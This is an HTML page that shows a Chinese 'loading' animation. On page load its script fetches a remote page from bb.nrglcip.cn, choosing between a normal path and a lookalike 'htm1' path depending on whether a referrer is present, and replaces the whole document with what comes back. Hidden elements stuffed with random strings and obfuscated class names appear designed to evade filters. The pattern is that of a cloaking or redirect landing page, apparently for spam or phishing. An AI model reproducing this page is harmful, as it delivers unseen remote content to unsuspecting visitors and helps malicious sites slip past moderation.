<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Wk0gYI {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Wk0gYI .gBJmTlQws6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Wk0gYI .content {
            line-height: 50px;
            text-align: center
        }

        .Wk0gYI .img {
            width: 100%
        }

        .Wk0gYI .qKIadhZT {
            text-align: center
        }

        .Wk0gYI .qKIadhZT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Wk0gYI .qKIadhZT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Wk0gYI .qKIadhZT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Wk0gYI .qKIadhZT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Wk0gYI .qKIadhZT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Wk0gYI .qKIadhZT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Wk0gYI .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function r9MtIWAfrtk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uos4S = r9MtIWAfrtk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uos4S +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uos4S +".html?a=share";
		}
		
        Kz9J3HQE=url+"#"+new Date().getTime();
        Kz9J3HQE && function() {
            $.get(Kz9J3HQE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >Q5rjhHKooDjPYMtagtk4QjWd6iOlybGAOg</li>
<p  style='display:none'>OjelgbPXL4UIwMREQc4i1dPSnSbMVkl0KIjftKDuXI6b2W6wEoWJoMTZ2n2HFKCbnmrPlwmgzKYme9sS32LtjYILt</p>
<span style='display:none'>gM3eN63GO6UxeWnwSBp4JYDeFS55mF7o3tXt</span>
<ul style='display:none' >duZAr7tlsTBWdZWbiWfJmWYJut3ExQFu1JSg5AkHifHtpBafD</ul>
<b style='display:none' >mtVeO9HzLCozMB1TbJvK90fVya6qn59FSDrSubWRVpuwKb7xqfZOyfK5oi5xlqezahxI39UN</b>
<img  src='' style='display:none'>
<li style='display:none' >Q5rjhHKooDjPYMtagtk4QjWd6iOlybGAOg</li>
<span style='display:none'>gM3eN63GO6UxeWnwSBp4JYDeFS55mF7o3tXt</span>
<span style='display:none'>gM3eN63GO6UxeWnwSBp4JYDeFS55mF7o3tXt</span><div class="Wk0gYI">
    <div class="gBJmTlQws6">
        <div class="qKIadhZT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >bqLlf1uSwRslsr11</li>
<h1 style='display:none' >O7UH2wZPzGiKiZcIqRrEEt968FlNwQf8IIVRrUjoJhAy2zbKpkErRqaJOztLYAWYWMJ8HvFi45MEBgDP8FJzEUjXx0LT5</h1>
<div style='display:none'>IuzAdqzWVr9CNyfjKIY6rZ1X7TLUHSEHCaENs0IJ47c6tS9yGotTruB</div>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Ed3UOPJ9Dz15Lu8zkA7FHsUB4X9SHhz9zBf6hpU4fTJQriyrZjcYOKmU9BRKoFe6JGiO4u0qFJ</a></body>
</html>